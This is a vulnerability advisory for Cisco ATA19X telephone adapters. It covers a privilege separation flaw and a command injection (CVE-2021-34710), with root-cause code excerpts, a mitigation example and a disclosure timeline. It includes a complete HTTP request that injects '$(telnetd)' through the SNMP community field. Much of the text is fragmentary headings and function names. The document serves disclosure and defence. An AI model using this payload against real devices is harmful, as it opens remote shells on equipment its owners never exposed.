Advisory: Cisco ATA19X Privilege Escalation and RCE

- Lack of User Privilege Separation Enforcement in Web Management Interface: The web management interface on the ATA191 does not necessarily prevent the "user" account from performing "admin"-privileged actions. As such, a user who logs in with "user" privileges is able to perform actions that should only be performed by an "admin" user.
- Post-Authentication Command Injection Remote Code Execution (CVE-2021-34710): The web management interface suffers from a post-authentication command injection issue, which can be exploited by an authenticated user.
- ATA 190 (On-premises only)
- ATA 191 (On-premises or Multiplatform)
- ATA 192 (Multiplatform only)

| Affected vendor & product | Cisco VOIP Adapter ATA19X (www.cisco.com) |
| --- | --- |
| Vendor Advisory | Cisco ATA 190 Series Analog Telephone Adapter Software Vulnerabilities |
| Vulnerable version | < 12.0(1)SR4, < 11.2.1 |
| Fixed version | 12.0(1)SR4, 11.2.1 |
| CVE IDs | CVE-2021-34710 |
| Impact | 8.8 (high) CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Credit | T. Shiomitsu, IoT Inspector Research Lab |
Cisco ATA19X Lack of User Privilege Separation Enforcement in Web Management Interface Root Cause Analysis
httpd
do_log_in_cgi()
httpd
do_auth()
Cisco ATA19X Post-Authentication Command Injection Remote Code Execution (CVE-2021-34710)
send_out_trap()
libspeak.so
system()
do_log_in_cgi()
httpd
```c
iVar1 = WebUser_Do_Auth(user,pwd,1,1);
if (iVar1 == -1) {
    nvram_set_printf("http_login_time","%d",iVar3 + 1);
    ct_syslog(5,3,"Login failed. Incorrect user name or password!");
    addLoginFailInfo(client_ip);
    send_out_trap(0xb,0);
    return -1;
}
```
send_out_trap()
snmptrap
- Configure SNMP trapping.
- Ensure that one of the trap parameters we pass is an injection string.
- Trigger the trap invocation somehow.
/apply.cgi
snmp_getcom
/apply.cgi
```http
POST /apply.cgi HTTP/1.1
Host: 192.168.1.149
Content-Type: application/x-www-form-urlencoded
Content-Length: 483
Origin: http://192.168.1.149
Connection: close
Referer: http://192.168.1.149/SNMP.asp
Cookie: SESSIONID=[...]
Upgrade-Insecure-Requests: 1

submit_button=SNMP&submit_type=&change_action=&gui_action=Apply&request_token=[...]&sortby=&snmp_trust=0.0.0.0%2F0.0.0.0&snmp_trust_origin=0.0.0.0%2F0.0.0.0&trap_ver=v1&snmp_reset_trusted=2&snmp_trust_prefix_ipv6=0&closeflg=0&privilege_str=&snmp_enable=1&snmp_trust_check=0&snmp_trust_check_v6=0&snmp_getcom=%24%28telnetd%29&snmp_setcom=private&snmpv3_enable=0&trap_ipaddr=192.168.15.100&trap_ipaddr_0=192.168.15.100&trap_port=162&snmp_ver=0&privilege_end=
```
$(telnetd)
snmp_getcom
send_out_trap()
snmp_getcom
system()
```c
nvram_sec_get("snmp_getcom",snmp_getcom,0x40);
[...]
cmd_fs = "snmptrap -%s -c %s %s:%s \"\" %s";
[...]
snprintf(cmd_buf,0x100,cmd_fs,trap_ver,snmp_getcom,trap_ipaddr_,trap_port,trap);
[...]
iVar2 = system(cmd_buf);
```
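The root cause above is that an NVRAM-controlled value is interpolated into a shell command string and passed to `system()`. As an added illustration (not Cisco's code), the following shows the two mitigations a fix would normally combine: validate the community string against a conservative allowlist, and invoke `snmptrap` through `execvp()` with an argument vector so that no shell ever parses the value. The allowlist and the 0x40 length bound are assumptions taken from the snippet's buffer size.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Reject community strings containing anything outside a conservative
 * allowlist (assumption: the product never needs other characters).
 * "$(telnetd)" fails here; "public" passes. */
int community_is_safe(const char *com, size_t maxlen)
{
    size_t n = strlen(com);
    if (n == 0 || n > maxlen)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)com[i];
        if (!(isalnum(c) || c == '-' || c == '_' || c == '.'))
            return 0;
    }
    return 1;
}

/* Send the trap with the same arguments send_out_trap() builds, but via
 * fork()/execvp() instead of system(). Returns the child's exit status,
 * or -1 if validation fails or the process cannot be run. */
int send_trap_noshell(const char *trap_ver, const char *community,
                      const char *host, const char *port, const char *oid)
{
    if (!community_is_safe(community, 0x40))
        return -1;
    char ver_flag[16], dest[300];
    snprintf(ver_flag, sizeof ver_flag, "-%s", trap_ver);  /* e.g. "-v1" */
    snprintf(dest, sizeof dest, "%s:%s", host, port);
    /* Each value is its own argv element: metacharacters are inert. */
    char *const argv[] = { "snmptrap", ver_flag, "-c", (char *)community,
                           dest, "", (char *)oid, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);  /* snmptrap binary missing or not executable */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```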
Conclusion
Timeline
- 2021/02/23 - Initial disclosure to Cisco PSIRT.
- 2021/03/02 - Confirmation of receipt by Cisco PSIRT case manager.
- 2021/03/02 - We confirm receipt and ask to be kept updated.
- 2021/03/29 - Cisco PSIRT follow up to state that the issues are being worked on.
- 2021/08/13 - Cisco PSIRT follow up to state that release date is tentatively early October.
- 2021/08/25 - We confirm receipt, and request updates.
- 2021/09/29 - Cisco PSIRT follow up with release date of October 6th.
- 2021/10/06 - Cisco publish their advisory.
- 2021/10/06 - We e-mail Cisco to request confirmation around the privilege escalation issue.
- 2021/10/07 - Cisco respond stating that they will be unable to answer this question until next week.
- 2021/10/07 - This article published.